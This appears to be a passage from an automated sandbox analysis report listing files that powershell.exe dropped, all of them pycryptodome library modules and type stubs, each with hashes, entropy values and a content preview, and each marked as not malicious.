                                                                                                                                                                                                                      SHA1:5AB8D14ED78244EDE81872A7638AADF2E03D99C6
                                                                                                                                                                                                                      SHA-256:AC571E9CE31374F5C5A2C179C14080BFE861A32C2385D7BACE8BB03B5BFB0620
                                                                                                                                                                                                                      SHA-512:5C570579738DDCFD872CFDB8774F8B63A43D0A31F7D17C307A88DC897F5A344AB649B542D7A10EE71CFB08534223973214A4A09FB0269C4343F663BBF81E1A6A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.ej.........................*.....d.Z.d.d.l.Z.d.d.l.m.Z...d...Z.d.d...Z.y.).zF.Legacy module for PKCS#1 PSS signatures...:undocumented: __package__......N)...pssc.....................T.......|.j...................|.|...........y.#.t.........t.........f.$.r...Y.y.w.x.Y.w.).NFT)..._verify..ValueError..TypeError)...self..hash_object..signatures.... .nC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/Signature/PKCS1_PSS.py.._pycrypto_verifyr....*...s3..................[.)..,..............."..............s..........'...'.c..........................t.........j...................|.|.|.|...........}.|.j...................|._.........t.........j...................t.........|.........|._.........|.S.).N)...mask_func..salt_bytes..rand_func).r......new..verifyr......types..MethodTyper....)...rsa_key..mgfunc..saltLen..randfunc..pkcs1s.... r....r....r....2...s>.........G.G.G.v..&.(....<.E....L.L.E.M.....#..#.$4.e..<.E.L....L.....).NNN)...__doc__
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1024
                                                                                                                                                                                                                      Entropy (8bit):5.197521113177315
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:IHasBU7cLzFt2xrmJFdDDz6f9/3oaJM4rPaYx3h/:I6sBU4PFt2xcjDzAAaaSai3l
                                                                                                                                                                                                                      MD5:8DD672416DC3A5A51A89ABF88DE3F380
                                                                                                                                                                                                                      SHA1:EEBDFF3E2AB4FDD29D5395DA2C5229220125D224
                                                                                                                                                                                                                      SHA-256:5852313241724B202DC7E94E8B50517764D38AF5E0D8D0C65F694AC277A953E1
                                                                                                                                                                                                                      SHA-512:CB0B5516D2F07B96A76FC268A973CA1BD94EE9E99446B37962C3FBE587568E9694A3F51708DF5EE1D47577D7403E77C645F22E32A3DD2CD5C2EE9E324F4F2C3C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.e..........................(.....d.Z.d.d.l.Z.d.d.l.m.Z...d...Z.d...Z.y.).zG.Legacy module for PKCS#1 v1.5 signatures...:undocumented: __package__......N)...pkcs1_15c.....................T.......|.j...................|.|...........y.#.t.........t.........f.$.r...Y.y.w.x.Y.w.).NFT)..._verify..ValueError..TypeError)...self..hash_object..signatures.... .oC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/Signature/PKCS1_v1_5.py.._pycrypto_verifyr....)...s3..................[.)..,..............."..............s..........'...'.c..........................t.........j...................|.........}.|.j...................|._.........t.........j...................t.........|.........|._.........|.S.).N).r......new..verifyr......types..MethodTyper....)...rsa_key..pkcs1s.... r....r....r....0...s5.........L.L....!.E....L.L.E.M.....#..#.$4.e..<.E.L....L.....)...__doc__r......Crypto.Signaturer....r....r......r....r......<module>r........s..........>..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):401
                                                                                                                                                                                                                      Entropy (8bit):5.402701031456713
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:AJm0VF1mikQ4NS1u+n7Z//2Iktpjag2O6:AJm0VTkNS1FZX2xCg2L
                                                                                                                                                                                                                      MD5:1DC1C9835C36EEA143B26F184D25F259
                                                                                                                                                                                                                      SHA1:78FBDAC6304935FC8D659944F56039AAC419C9EC
                                                                                                                                                                                                                      SHA-256:323950BB96300E4FD1B12E52C72116D9FC6201702A05D241DA45429DA6F1AD03
                                                                                                                                                                                                                      SHA-512:873A9BBDAB985755DB31AAEFA5FAD97A78FAF04F8AFE16322A129D4CC1ECD8F2662C4456E6B89C8990A3716941C364CC80E34F9EE9ED684FA0391C467267844D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.e................................d.Z.g.d...Z.y.).zeDigital signature protocols..A collection of standardized protocols to carry out digital signatures..)...PKCS1_v1_5..PKCS1_PSS..DSS..pkcs1_15..pss..eddsaN)...__doc__..__all__........mC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/Signature/__init__.py..<module>r........s..........>.......I...r....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):14138
                                                                                                                                                                                                                      Entropy (8bit):5.226892498359152
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:di/VFI1fVFbYcmp55ImSkaMHYD5V66lQedAAso5HVxCEfa:0IFbQImNaMHQbEAN7ta
                                                                                                                                                                                                                      MD5:17F19BBE8F5FD25B091419EDA64415D7
                                                                                                                                                                                                                      SHA1:D148E0AA8132492F03FFA23B7FFC28E1637D8ABB
                                                                                                                                                                                                                      SHA-256:74E2D15966779252FDE49E4075FF455A7268216A9B05DDF475C79F06545AADAD
                                                                                                                                                                                                                      SHA-512:EA4EF9F26BA8E7616E3B3B4EDEB5C7536B576D90495B5CBB302ED94838545388163DF96BEC23EDAF517909C968891472E8877031427269D5A9FA5CFAE6A0D53C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.e.1........................r.....d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d...Z.d...Z...G.d...d.e.........Z.d.d...Z.y.)......)...Integer)...SHA512..SHAKE256)...bchr..is_bytes)...EccKey..construct.._import_ed25519_public_key.._import_ed448_public_keyc...........................t.........|.........d.k(..r.t.........|.........\...}.}.d.}.n6t.........|.........d.k(..r.t.........|.........\...}.}.d.}.n.t.........d.t.........|.........z.............t.........|.|.|...........S.).a....Create a new Ed25519 or Ed448 public key object,. starting from the key encoded as raw ``bytes``,. in the format described in RFC8032... Args:. encoded (bytes):. The EdDSA public key to import.. It must be 32 bytes for Ed25519, and 57 bytes for Ed448... Returns:. :class:`Crypto.PublicKey.EccKey` : a new ECC key object... Raises:. ValueError: when the given key cannot be parsed.. . .....Ed25519.9.....Ed448z.Not an EdDSA key (%d by
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7403
                                                                                                                                                                                                                      Entropy (8bit):5.424874183336652
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:sL2tHYkks5L9t+Mtmp5NOZHpvplryOect1VpqqLdVVssre8kzCLxgvgk6ZdJuuXe:Ouj5htB05N0wytZqqLdPKCwgk6fte
                                                                                                                                                                                                                      MD5:80E014D8C7DCF337E8478013589B0266
                                                                                                                                                                                                                      SHA1:3AB979F9EA133CA0D683716AE054A9D8EC36564B
                                                                                                                                                                                                                      SHA-256:A62506D5CAF683FD8CC62CD633BBEC7AC3E0CF68A7E98E1EAF131374470F8DEA
                                                                                                                                                                                                                      SHA-512:6D056D710171AAEF6AF25BBD17E053E6C13CFA97CD1873B53CE69A475EE7534221BE7F1E10D20DF85C24BA59788F590F63F87CB7947F6DE6574218D1566030E4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.e.#........................Z.....d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.....G.d...d.........Z.d.d...Z.d...Z.y.)......N)...ceil_div..bytes_to_long..long_to_bytes)...DerSequence..DerNull..DerOctetString..DerObjectIdc.....................(.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.y.)...PKCS115_SigSchemez.A signature object for ``RSASSA-PKCS1-v1_5``.. Do not instantiate directly.. Use :func:`Crypto.Signature.pkcs1_15.new`.. c...........................|.|._.........y.).a....Initialize this PKCS#1 v1.5 signature scheme object... :Parameters:. rsa_key : an RSA key object. Creation of signatures is only possible if this is a *private*. RSA key. Verification of signatures is always possible.. N)..._key)...self..rsa_keys.... .mC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/Signature/pkcs1_15.py..__init__z.PKCS115_SigScheme.__init__)...s....................c.....................6.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):14333
                                                                                                                                                                                                                      Entropy (8bit):5.382597998424615
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:jXo59h4tDrSbbCzgREsNPGiRRFUcwFKFqUkBO8lpBlYozys:jY5vIc28qsVGiRRWFKspOaBe/s
                                                                                                                                                                                                                      MD5:0D661203ED88913F6F5B3376F64A8514
                                                                                                                                                                                                                      SHA1:F58A3F8BAF7EE72B51490DF558C25459D9CB77BA
                                                                                                                                                                                                                      SHA-256:72AA22A6F21F9D75D45876B258C72D45B4A7D6CBC300DF437650BCD6D3BBB156
                                                                                                                                                                                                                      SHA-512:6394A7965166959D4372CF88A0A61FC1FEBE4B04CD3B2F7B2AE5A3AEF0BBE6648F4CF2D55CBCE451ABFC7D39FA76C49A5D97177472DE745FA6500CB47EEB9E94
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.e.6........................x.....d.d.l.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.d...Z.d...Z.d...Z.d...Z.y.)......)...bchr..bord..iter_rangeN)...ceil_div..long_to_bytes..bytes_to_long)...strxor)...Randomc.....................(.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.y.)...PSS_SigSchemezvA signature object for ``RSASSA-PSS``.. Do not instantiate directly.. Use :func:`Crypto.Signature.pss.new`.. c.....................<.....|.|._.........|.|._.........|.|._.........|.|._.........y.).at...Initialize this PKCS#1 PSS signature scheme object... :Parameters:. key : an RSA key object. If a private half is given, both signature and. verification are possible.. If a public half is given, only verification is possible.. mgfunc : callable. A mask generation function that accepts two parameters:. a string to use as seed, and the lenth of the mask to.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12758
                                                                                                                                                                                                                      Entropy (8bit):4.953249726457768
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:6qrskrs9t3q/IVQVluiDVluYQu1s1NuMMMt:Frskrs9VqMlB1L
                                                                                                                                                                                                                      MD5:0A4AF23CD5DF55B2C6E57D27689FCD5C
                                                                                                                                                                                                                      SHA1:EAC0752A6E323C8A7EEB4D740268364526422DB5
                                                                                                                                                                                                                      SHA-256:2DC65C619AFC2F1F5D170FA8FC67998B78FEB6ECC9EA4A3375AFE3C10AB37348
                                                                                                                                                                                                                      SHA-512:E540382C6CCBACA754AED2B9F9A0D90938A37A00ED27B3829AD69B6089EC267767BEEB10968FD30BA7CBA586E20EB2DA6FE5D5ABC69AFA77AFE935C5D2D3482B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2022, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):747
                                                                                                                                                                                                                      Entropy (8bit):4.991320777959256
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:1REYBlRE1BvxS+1dw1z4L556trLuh72tR5A8TTo448/u4Jw1AL1A19YRG98mfvIs:1REOC1++161z4Nfh7IGhI+1mAl9Zfjuk
                                                                                                                                                                                                                      MD5:F75719D633E9543F8B2191818F5F949E
                                                                                                                                                                                                                      SHA1:50C2F1E8A90E757A473DDD36FA897EBA33B52786
                                                                                                                                                                                                                      SHA-256:AB1B0BBE6DF0B563E17CF22EB3DCE37DAC436C836F19A3498647B6A167BC2C45
                                                                                                                                                                                                                      SHA-512:B5472537D636DB5D8EE6BADEA791816C4E6B052D899AB443D8BC5CB5E4721B1C1B79160F114FEC8A289578566084D3B5C8E7E0385066A331FC9864465BBD0541
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, Optional..from typing_extensions import Protocol..from Crypto.PublicKey.ECC import EccKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class XOF(Protocol):.. def read(self, len: int) -> bytes: .......def import_public_key(encoded: bytes) -> EccKey: .....def import_private_key(encoded: bytes) -> EccKey: .......class EdDSASigScheme(object):.... def __init__(self, key: EccKey, context: bytes) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_or_hash: Union[bytes, Hash, XOF]) -> bytes: ..... def verify(self, msg_or_hash: Union[bytes, Hash, XOF], signature: bytes) -> None: .......def new(key: EccKey, mode: str, context: Optional[bytes]=None) -> EdDSASigScheme: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9088
                                                                                                                                                                                                                      Entropy (8bit):5.053423261865839
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/ISM97UQFA2CEkoA3KhNzYaomc:0rskrs9VqdM97UQFAM+go
                                                                                                                                                                                                                      MD5:8DD798B530CC55801BC2744A469CD46F
                                                                                                                                                                                                                      SHA1:70FBA1485270D0F63B5C676B2AFC0CCAF606A06F
                                                                                                                                                                                                                      SHA-256:2E59C1BB1C7A738F51343213C94F49503CB91BAD07D906272FA44BCC1CEDD8FA
                                                                                                                                                                                                                      SHA-512:82DBDDC02494535B90B4388ED6698CBC4F90A0589B32A5D693C8134BF682007896E47C0055C222FE89260AF21CE8E0D4F639CEE61F02677893BD82937C310173
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):581
                                                                                                                                                                                                                      Entropy (8bit):5.067047688730709
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:1REYBkRE1Bvxp+1bgBx1z4L556W3x1AggPIbY9Bw5ZwWOLRwlbQgA85A3A0PIbR3:1REFC19+1bs1z4NNrAPAbY9Bw+LRwlbf
                                                                                                                                                                                                                      MD5:DC28B90A844CBE3BCE2F14FBAD339B51
                                                                                                                                                                                                                      SHA1:920E136B27895D970DE44FC61B00180D4DB686F2
                                                                                                                                                                                                                      SHA-256:E2CE13431A88DD8206D23EF6C0E1935B61795A97166309CA8FBED78D68AF6FED
                                                                                                                                                                                                                      SHA-512:BC0C4D5F5FD2DB593B00144EB4DDC1BEE12B71CA399CC08C25F00C11B0463404B64FD20F2A13FC91B83ED7DE03E132AA1E968D12373D96E74BFDA0C4CA68A105
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class PKCS115_SigScheme:.. def __init__(self, rsa_key: RsaKey) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> None: .......def _EMSA_PKCS1_V1_5_ENCODE(msg_hash: Hash, emLen: int, with_hash_parameters: Optional[bool]=True) -> bytes: .......def new(rsa_key: RsaKey) -> PKCS115_SigScheme: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13970
                                                                                                                                                                                                                      Entropy (8bit):4.861341757640308
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/IFlYlgXJ0rcUfsOg58VFJbAVFtn3sxliqu8:0rskrs9Vq+GgXirHfsv8VEVP8/RL
                                                                                                                                                                                                                      MD5:2A9F316CD479BB56AE101218E1B96816
                                                                                                                                                                                                                      SHA1:3E63E6B6F8D771082C7DFF39B827BBB55BDA5CA9
                                                                                                                                                                                                                      SHA-256:47736BFBB2762DEA089BE962E283E1E1155C51A2280C1839F5494B5BA9B72973
                                                                                                                                                                                                                      SHA-512:C0F595025D3C77DB448177FFFAEC7FFA82FC021F08A351E00644CCA0F1006B1D68B4D6D567D242D56040CB7180D8B69DDD592C9ED85D653C34F8CCA026DCB84D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1071
                                                                                                                                                                                                                      Entropy (8bit):5.102431129383602
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1RE2C19+1bsY4Nf3fkKov27aBAOzev9Bw+LAu8Bo633XfD7:Jy+1o3xf1ov2GovRLAVnPf
                                                                                                                                                                                                                      MD5:505820D514B9F7B2244301F2DC317034
                                                                                                                                                                                                                      SHA1:A90CFF03252A14134E286EB646ED62D9B82E076D
                                                                                                                                                                                                                      SHA-256:0A62FC61A9C9A60FDADEFBCF20BCAD59140D16C09E4485A28820F9D14B156ACE
                                                                                                                                                                                                                      SHA-512:B5A534C52FC07BC8E0A145F628857381F7A8F4570459A83D3DFD4BFB0A6BD526465C1291CB8F2714F5B8A02D12A3403FBEC6B666BE49608B87D3CA80E10D8EC8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, Callable, Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey......class Hash(Protocol):.. def digest(self) -> bytes: ..... def update(self, bytes) -> None: .........class HashModule(Protocol):.. @staticmethod.. def new(data: Optional[bytes]) -> Hash: .........MaskFunction = Callable[[bytes, int, Union[Hash, HashModule]], bytes]..RndFunction = Callable[[int], bytes]....class PSS_SigScheme:.. def __init__(self, key: RsaKey, mgfunc: MaskFunction, saltLen: int, randfunc: RndFunction) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> None: .........MGF1 : MaskFunction..def _EMSA_PSS_ENCODE(mhash: Hash, emBits: int, randFunc: RndFunction, mgf:MaskFunction, sLen: int) -> str: .....def _EMSA_PSS_VERIFY(mhash: Hash, em: str, emBits: int, mgf: MaskFunction, sLen: int) -> None: .....def new(rsa_key: RsaKey, *
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3292
                                                                                                                                                                                                                      Entropy (8bit):5.003098854081704
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:MRwEIB0jcQHMsvI/S3oCFGAZUqjZibFduSmZpoRE3bpJ5U:MRwfFQHvo2Uq1cFYSYpCE3bpJ5U
                                                                                                                                                                                                                      MD5:25E5852A52182CBF645AC075BDE04C8E
                                                                                                                                                                                                                      SHA1:5431574C5E607B91EE33D90D2DBD52E6634622A5
                                                                                                                                                                                                                      SHA-256:E0D9B91A882D3986EF288761C85527F658E552B9A48B02AD630896A10B155F9B
                                                                                                                                                                                                                      SHA-512:8AE1F5A17386A33B2C6E4D9360C2CCFEA10549DCDDAA920919B12C8FF4975AAA536E759C5C98885E9863194381B3C9B1E40D935C2562C80786CC9EEAE238A4BD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: ascii -*-..#..# Util/Counter.py : Fast counter for use with CTR-mode ciphers..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):295
                                                                                                                                                                                                                      Entropy (8bit):4.705947008789207
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:1REYBr0hxrMND0R2D9F6s/2F62LMJteOFr2gCUA2gA1MJFuJry:1REYBr0DI1RFF2FDLMJzZ2gCn2gA1gM4
                                                                                                                                                                                                                      MD5:48844D3840F12D7CC253481AEB936730
                                                                                                                                                                                                                      SHA1:2329321B884361FF52CD1E79D4ECD3ABD2C08309
                                                                                                                                                                                                                      SHA-256:7A86661370C3B894AEB4EDAD8755466DE52226588608A530F63F3E3379585AD0
                                                                                                                                                                                                                      SHA-512:06990D253057568DB8B16CAFF5599CD48FDE3100B5193213BD250BD1797D11F2A62C00D493AAC5CA60CD557514B3AC543454D9D50991B9EEAA735B3D6E3A7150
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Optional, Union, Dict....def new(nbits: int, prefix: Optional[bytes]=..., suffix: Optional[bytes]=..., initial_value: Optional[int]=1,.. little_endian: Optional[bool]=False, allow_wraparound: Optional[bool]=False) -> \.. Dict[str, Union[int, bytes, bool]]: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4421
                                                                                                                                                                                                                      Entropy (8bit):5.191112640865006
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:e1tDqrYJALrYJHdt3EHGuI2gHdYUI1e+GJF37gR8C91/ErvyGAhQyAk:e1Vqrskrs9t3q/ILxF379aGyQyh
                                                                                                                                                                                                                      MD5:FBF391FD249DDBB1C32502AC42999B5D
                                                                                                                                                                                                                      SHA1:9559F22269BBE2A0F918705DED635B8CC666DD10
                                                                                                                                                                                                                      SHA-256:A04416E7AA698FFFC0301EE284720426B69E9A3BCB2A0C7E954A054698C29405
                                                                                                                                                                                                                      SHA-512:4241AEF302C010640C2FA86D92F2EE7EA34A865F759D14C02024F62A3452C593C0BCCABFE46043E879EB1CD73A290F85C0DD106A294684F628C100EA06382DF9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# Util/Padding.py : Functions to manage padding..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SH
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):243
                                                                                                                                                                                                                      Entropy (8bit):4.823438083026704
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:1REYB0yqDLWJJni6Co6sRGcp5gUeQ/6sRGcp5/:1REYBkDyHZHRGe5VeQPRGe5/
                                                                                                                                                                                                                      MD5:72AE5A92A5B5373240F3184324E84F6B
                                                                                                                                                                                                                      SHA1:976AEA0ED87A3C086D068AE560FDB2FFCD591676
                                                                                                                                                                                                                      SHA-256:ED464B7B39D2481D2C4DE1FF908308ADF7F035B21B3F7A242E469F1BD173DEF6
                                                                                                                                                                                                                      SHA-512:27C15B7D76E180E1B65D566D8225C3661E78854515C9716A645C5F62E444B5A90AB61DDF92677B9C4A1276921711C281C814CAC60FA6D0BFC76A7716E4124613
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Optional....__all__ = [ 'pad', 'unpad' ]....def pad(data_to_pad: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: .....def unpad(padded_data: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: ...
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):21578
                                                                                                                                                                                                                      Entropy (8bit):4.591349548627808
                                                                                                                                                                                                                      Encrypted:false
